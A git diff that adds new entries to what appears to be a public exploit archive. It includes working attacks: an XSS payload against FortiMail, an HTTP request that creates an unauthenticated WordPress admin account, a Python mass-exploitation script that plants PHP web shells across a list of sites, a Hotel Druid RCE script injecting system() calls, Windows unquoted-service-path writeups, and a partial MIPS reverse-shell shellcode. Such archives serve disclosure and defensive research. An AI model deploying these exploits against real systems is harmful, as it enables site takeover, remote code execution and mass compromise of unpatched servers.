diff --git a/exploits/multiple/webapps/50759.txt b/exploits/multiple/webapps/50759.txt new file mode 100644 index 000000000..c78c02d49 --- /dev/null +++ b/exploits/multiple/webapps/50759.txt @@ -0,0 +1,24 @@ +# Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS) +# Google Dork: inurl:/fmlurlsvc/ +# Date: 01-Feb-2022 +# Exploit Author: Braiant Giraldo Villa +# Contact: @iron_fortress (Twitter) +# Vendor Homepage: https://www.fortinet.com/products/email-security +# Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online) +# Version: +# FortiMail version 7.0.1 and below +# FortiMail version 6.4.5 and below +# FortiMail version 6.2.7 and below +# CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185) + + +1. Description: +An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service. + +2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E +3. Proof of Concept: +https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E + +4. References +https://www.fortiguard.com/psirt/FG-IR-21-185 +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062 \ No newline at end of file diff --git a/exploits/php/webapps/50752.txt b/exploits/php/webapps/50752.txt new file mode 100644 index 000000000..3c90f09a6 --- /dev/null +++ b/exploits/php/webapps/50752.txt @@ -0,0 +1,21 @@ +# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation +# Date: 16.02.2022 +# Author: Numan Türle +# CVE: CVE-2022-0441 +# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ +# Version: <2.7.6 +# https://www.youtube.com/watch?v=SI_O6CHXMZk +# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6 +# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed + + +POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1 +Connection: close +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4 +Content-Type: application/json +Content-Length: 339 + +{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}} \ No newline at end of file diff --git a/exploits/php/webapps/50753.py b/exploits/php/webapps/50753.py new file mode 100755 index 000000000..221884261 --- /dev/null +++ b/exploits/php/webapps/50753.py @@ -0,0 +1,111 @@ +# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated) +# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds +# Date: 16/02/2022 +# Exploit Author: Overthinker1877 (1877 Team) +# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/ +# Version: 6.60 +# Tested on: Windows / Linux + +import os +import requests +import threading +from multiprocessing.dummy import Pool,Lock +from bs4 import BeautifulSoup +import time +import smtplib,sys,ctypes +from random import choice +from colorama import Fore +from colorama import Style +from colorama import init +import re +import time +from time import sleep +init(autoreset=True) +fr = Fore.RED +gr = Fore.BLUE +fc = Fore.CYAN +fw = Fore.WHITE +fy = Fore.YELLOW +fg = Fore.GREEN +sd = Style.DIM +sn = Style.NORMAL +sb = Style.BRIGHT +Bad = 0 +Good = 0 +def Folder(directory): + if not os.path.exists(directory): + os.makedirs(directory) +Folder("exploited") +def clear(): + try: + if os.name == 'nt': + os.system('cls') + else: + os.system('clear') + except: + pass +def finder(i) : + global Bad,Good + head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} + try : + x = requests.session() + listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php'] + for script in listaa : + url = (i+"/"+script) + while True : + req_first = x.get(url, headers=head) + if "error:http raw post data does not exist" in req_first.text : + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"} + burp0_data = "\".$_FILES['f']['name'].\"\");\r\n?>" + requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45) + urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php") + req_second = x.get(urlx, headers=head) + if "Overthinker1877" in req_second.text : + Good = Good + 1 + print(fg+"Exploited "+fw+">> "+fg+" = "+urlx) + with open("exploited/shell.txt","a") as file : + file.write(urlx+"\n") + file.close() + else : + Bad = Bad + 1 + print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit") + else : + Bad = Bad + 1 + print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln") + + pass + break + except : + pass + if os.name == 'nt': + ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad)) + else : + sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad)) + +def key_logo(): + clear = '\x1b[0m' + colors = [36, 32, 34, 35, 31, 37] + x = ' [ + ] OVERTHINKER1877 EXPLOIT' + for N, line in enumerate(x.split('\n')): + sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear)) + time.sleep(0.05) + +def process(line): + time.sleep(1) + + +def run() : + key_logo() + clear() + print(""" + [-] -----------------------------------------[-] + [+] WwW.1877.TeaM + [-] -----------------------------------------[-] + \n \n""") + file_name = input("Website List : ") + op = open(file_name,'r').read().splitlines() + TEXTList = [list.strip() for list in op] + p = Pool(int(input('Thread : '))) + p.map(finder, TEXTList) + +run() \ No newline at end of file diff --git a/exploits/php/webapps/50754.py b/exploits/php/webapps/50754.py new file mode 100755 index 000000000..c08df71f3 --- /dev/null +++ b/exploits/php/webapps/50754.py @@ -0,0 +1,144 @@ +# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE) +# Date: 05/01/2022 +# Exploit Author: 0z09e (https://twitter.com/0z09e) +# Vendor Homepage: https://www.hoteldruid.com/ +# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz +# Version: 3.0.3 +# CVE : CVE-2022-22909 + +#!/usr/bin/python3 +import requests +import argparse + +def login( target , username = "" , password = "", noauth=False): + login_data = { + "vers_hinc" : "1", + "nome_utente_phpr" : username, + "password_phpr" : password + } + if not noauth: + login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False ) + if ' ')[0] + anno = login_req.text.split('')[0] + ret_data = {"token" : token , "anno" : anno} + #print("ret data" + ret_data) + return ret_data + else: + return False + else: + login_req = requests.get(f"{target}/inizio.php" , verify=False ) + try: + anno = login_req.text.split('')[0] + token = "" + ret_data = {"token" : token , "anno" : anno} + return ret_data + except: + return False + +def check_privilege(target , anno , token=""): + priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False) + #print(priv_req.text) + if "Modify" in priv_req.text: + return True + else: + return False + +def add_room(target , anno , token=""): + add_room_data = { + "anno": anno, + "id_sessione": token, + "n_app":"{${system($_REQUEST['cmd'])}}", + "crea_app":"SI", + "crea_letti":"", + "n_letti":"", + "tipo_tabella":"appartamenti" + } + add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False) + #print(add_req.text) + if "has been added" in add_req.text: + return True + else: + return False +def test_code_execution(target): + code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id") + if "uid=" in code_execution_req.text: + return code_execution_req.text.split("\n")[0] + else: + return False + + +def main(): + + banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$ +| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$ +| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ +| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$ +| $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$ +| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$ +| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$ +|__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n""" + + + parser = argparse.ArgumentParser() + req_args = parser.add_argument_group('required arguments') + req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True) + req_args.add_argument("-u" , "--username" , help="Username" , required=False) + req_args.add_argument("-p" , "--password" , help="password", required=False) + req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False) + args = parser.parse_args() + + target = args.target + if target[-1] == "/": + target = target[:-1] + noauth = args.noauth + + username = args.username + password = args.password + + if noauth == False and (username == None or password == None): + print('[-] Please provide the authentication method.' ) + quit() + + print(banner) + if not noauth: + print(f"[*] Logging in with the credential {username}:{password}") + login_result = login(username = username , password = password , target = target) + if login_result != False: + token = login_result.get('token') + anno = login_result.get('anno') + else: + print("[-] Login failed, Check your credential or check if login is required or not .") + quit() + else: + print('[*] Trying to access the Dashboard.') + login_result = login(username = username , password = password , target = target , noauth=True) + if login_result != False: + token = login_result.get('token') + anno = login_result.get('anno') + else: + print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.') + exit() + print("[*] Checking the privilege of the user.") + if check_privilege(target= target , token=token , anno=anno): + print("[+] User has the privilege to add room.") + else: + print("[-] User doesn't have the privilege to add room.") + exit() + print("[*] Adding a new room.") + if add_room(target = target , anno=anno , token=token): + print('[+] Room has been added successfully.') + else: + print('[-] Unknown error occured, unable to add room. Maybe the room has already been added') + exit() + print('[*] Testing code exection') + output = test_code_execution(target = target) + if output != False: + print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.") + print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id') + print(f"[+] Example Output : {output}") + exit() + else: + print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname") + exit() +main() \ No newline at end of file diff --git a/exploits/windows/local/50755.txt b/exploits/windows/local/50755.txt new file mode 100644 index 000000000..263342690 --- /dev/null +++ b/exploits/windows/local/50755.txt @@ -0,0 +1,35 @@ +# Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2022-02-17 +# Vendor Homepage: https://www.wondershare.com/ +# Software Link : https://download.wondershare.com/drfone_full3360.exe +# Tested Version: 11.4.9 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """ + +Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto + + +# Service info: + +C:\>sc qc DFWSIDService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: DFWSIDService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare WSID help + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50756.txt b/exploits/windows/local/50756.txt new file mode 100644 index 000000000..b207ba586 --- /dev/null +++ b/exploits/windows/local/50756.txt @@ -0,0 +1,35 @@ +# Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2022-02-17 +# Vendor Homepage: https://www.wondershare.com/ +# Software Link : https://download.wondershare.com/mobiletrans_full5793.exe +# Tested Version: 3.5.9 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """ + +Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto + + +# Service info: + +C:\>sc qc ElevationService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ElevationService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare Driver Install Service help + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50757.txt b/exploits/windows/local/50757.txt new file mode 100644 index 000000000..678af2617 --- /dev/null +++ b/exploits/windows/local/50757.txt @@ -0,0 +1,35 @@ +# Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2022-02-17 +# Vendor Homepage: https://www.wondershare.com/ +# Software Link : https://download-es.wondershare.com/famisafe_full7869.exe +# Tested Version: 1.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """ + +FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto + + +# Service info: + +C:\>sc qc FSService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: FSService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : FSService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50758.txt b/exploits/windows/local/50758.txt new file mode 100644 index 000000000..4820d23d6 --- /dev/null +++ b/exploits/windows/local/50758.txt @@ -0,0 +1,35 @@ +# Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2022-02-17 +# Vendor Homepage: https://www.wondershare.com/ +# Software Link : https://download.wondershare.com/ubackit_full8767.exe +# Tested Version: 2.0.5 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """ + +Wondershare wsbackup Service wsbackup C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe Auto + + +# Service info: + +C:\>sc qc wsbackup +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: wsbackup + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare wsbackup Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50760.txt b/exploits/windows/local/50760.txt new file mode 100644 index 000000000..45864a597 --- /dev/null +++ b/exploits/windows/local/50760.txt @@ -0,0 +1,23 @@ +#Exploit Title: TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2022-02-17 +#Vendor : TOSHIBA +#Version : TOSHIBA Navi Support Service 1.00.0000 +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== +C:\Users\Administrador>sc qc TNaviSrv +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: TNaviSrv + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD +PLAYER\TNaviSrv.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : TOSHIBA Navi Support Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50761.txt b/exploits/windows/local/50761.txt new file mode 100644 index 000000000..d6ceb95f5 --- /dev/null +++ b/exploits/windows/local/50761.txt @@ -0,0 +1,25 @@ +#Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path +#Exploit Date: 2022-02-17 +#Vendor : IVT Corp +#Version : BlueSoleilCS 5.4.277 +#Vendor Homepage : www.ivtcorporation.com +#Tested on OS: Windows 7 Pro + +#This software installs EDTService.exe version 11.10.2.1 + +#Analyze PoC : +============== +C:\>sc qc BlueSoleilCS +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: BlueSoleilCS + TIPO : 120 WIN32_SHARE_PROCESS (interactive) + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\IVT +Corporation\BlueSoleil\BlueSoleilCS.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : BlueSoleilCS + DEPENDENCIAS : RPCSS + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50762.txt b/exploits/windows/local/50762.txt new file mode 100644 index 000000000..88bb666ff --- /dev/null +++ b/exploits/windows/local/50762.txt @@ -0,0 +1,26 @@ +#Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2022-02-17 +#Vendor : Intel +#Version : Intel(R) Management Engine Components 6.0.0.1189 +#Vendor Homepage : https://www.intel.com +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== + +C:\>sc qc LMS +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: LMS + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R) +Management Engine Components\LMS\LMS.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Intel(R) Management and Security Application +Local Management Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50763.txt b/exploits/windows/local/50763.txt new file mode 100644 index 000000000..4c4cdaa42 --- /dev/null +++ b/exploits/windows/local/50763.txt @@ -0,0 +1,25 @@ +#Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2022-02-14 +#Vendor : Hewlett-Packard(HP) +#Version : File Sanitizer for HP ProtectTools 5.0.1.3 +#Vendor Homepage : http://www.hp.com +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== + +C:\>sc qc HPFSService +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: HPFSService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File +Sanitizer\HPFSService.exe + GRUPO_ORDEN_CARGA : File System + ETIQUETA : 0 + NOMBRE_MOSTRAR : File Sanitizer for HP ProtectTools + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50764.txt b/exploits/windows/local/50764.txt new file mode 100644 index 000000000..39ae1e5d2 --- /dev/null +++ b/exploits/windows/local/50764.txt @@ -0,0 +1,27 @@ +#Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2022-02-17 +#Vendor : Connectify Inc +#Version : Connectify Hotspot 2018 +#Vendor Homepage : https://www.connectify.me/ +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== + +C:\>sc qc Connectify +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Connectify + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\Connectify\ConnectifyService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Connectify Hotspot 2018 + DEPENDENCIAS : wlansvc + : winmgmt + : http + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f4c0b3395..708ee1169 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11441,6 +11441,15 @@ id,file,description,date,author,type,platform,port 50728,exploits/windows/local/50728.txt,"Cain & Abel 4.9.56 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows, 50743,exploits/windows/local/50743.txt,"TeamSpeak 3.5.6 - Insecure File Permissions",1970-01-01,"Aryan Chehreghani",local,windows, 50745,exploits/windows/local/50745.txt,"Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, +50755,exploits/windows/local/50755.txt,"Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, +50756,exploits/windows/local/50756.txt,"Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, +50757,exploits/windows/local/50757.txt,"Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, +50758,exploits/windows/local/50758.txt,"Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, +50760,exploits/windows/local/50760.txt,"TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path",1970-01-01,SamAlucard,local,windows, +50761,exploits/windows/local/50761.txt,"Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path",1970-01-01,SamAlucard,local,windows, +50762,exploits/windows/local/50762.txt,"Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path",1970-01-01,SamAlucard,local,windows, +50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",1970-01-01,SamAlucard,local,windows, +50764,exploits/windows/local/50764.txt,"Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path",1970-01-01,SamAlucard,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44821,3 +44830,7 @@ id,file,description,date,author,type,platform,port 50741,exploits/multiple/webapps/50741.py,"ServiceNow - Username Enumeration",1970-01-01,"Victor Hanna",webapps,multiple, 50744,exploits/hardware/webapps/50744.txt,"Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Luis Martínez",webapps,hardware, 50746,exploits/php/webapps/50746.txt,"WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php, +50752,exploits/php/webapps/50752.txt,"WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation",1970-01-01,"numan türle",webapps,php, +50753,exploits/php/webapps/50753.py,"WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Overthinker1877,webapps,php, +50754,exploits/php/webapps/50754.py,"Hotel Druid 3.0.3 - Remote Code Execution (RCE)",1970-01-01,0z09e,webapps,php, +50759,exploits/multiple/webapps/50759.txt,"Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Braiant Giraldo Villa",webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 5dabbd8c3..587f2c638 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1046,3 +1046,7 @@ id,file,description,date,author,type,platform 50710,shellcodes/windows_x86/50710.asm,"Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)",1970-01-01,Techryptic,shellcode,windows_x86 50711,shellcodes/windows_x86/50711.asm,"Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86 50722,shellcodes/windows_x86/50722.asm,"Windows/x86 - Locate kernel32 base address / Stack Crack method NullFree Shellcode (171 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86 +50748,shellcodes/solaris_sparc/50748.c,"Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc +50749,shellcodes/solaris_sparc/50749.c,"Solaris/SPARC - chmod(./me) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc +50750,shellcodes/solaris_sparc/50750.c,"Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc +50751,shellcodes/linux_mips/50751.c,"Linux/MIPS - N32 MSB Reverse Shell Shellcode",1970-01-01,"Marco Ivaldi",shellcode,linux_mips diff --git a/shellcodes/linux_mips/50751.c b/shellcodes/linux_mips/50751.c new file mode 100644 index 000000000..d732c2d4d --- /dev/null +++ b/shellcodes/linux_mips/50751.c @@ -0,0 +1,90 @@ +/* + * mips_n32_msb_linux_revsh.c - MIPS N32 MSB Linux reverse + * Copyright (c) 2022 Marco Ivaldi + * + * Basic MIPS N32 MSB Linux reverse shellcode, showcasing various + * techniques to avoid badchars. + * + * Cross-compile (https://buildroot.org/) with: + * $ mips64-linux-gcc -static mips_n32_msb_linux_revsh.c -o revsh + * + * Tested on Linux MIPS64 Cavium Octeon III. I placed the shellcode on the + * stack, because on my test device the .data section was not executable. + * + * Based on https://youtu.be/0-_Wtz5L9ZY by Evan Walls at tacnetsol.com. + */ + +void main() +{ + char sc[] = + + // sub technique + "\x24\x0d\xff\xfa" // li $t1, -6 + "\x01\xa0\x68\x27" // nor $t1, $zero # 5 + + // sock = socket(2, 2, 0) + "\x25\xa4\xff\xfd" // addiu $a0, $t1, -3 # 2 + "\x25\xa5\xff\xfd" // addiu $a1, $t1, -3 # 2 + "\x25\xa6\xff\xfb" // addiu $a2, $t1, -5 # 0 + "\x24\x02\x17\x98" // li $v0, 0x1798 # socket (0x1798) + "\x01\x01\x01\x0c" // syscall 0x40404 + "\x24\x50\x10\x10" // addiu $s0, $v0, 0x1010 # sock + 0x1010 + + // xor technique + "\x24\x0e\x21\x21" // li $t2, 0x2121 + + // connect(sock, {2, 0x5ac2, 0x5db8d822}, 16) + "\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock + "\x39\xcc\x21\x23" // xori $t0, $t2, 0x2123 # 2 + "\xa7\xac\xff\xec" // sh $t0, -20($sp) + "\x24\x0c\x5a\xc2" // li $t0, 0x5ac2 # 23234 << XXX port + "\xa7\xac\xff\xee" // sh $t0, -18($sp) + 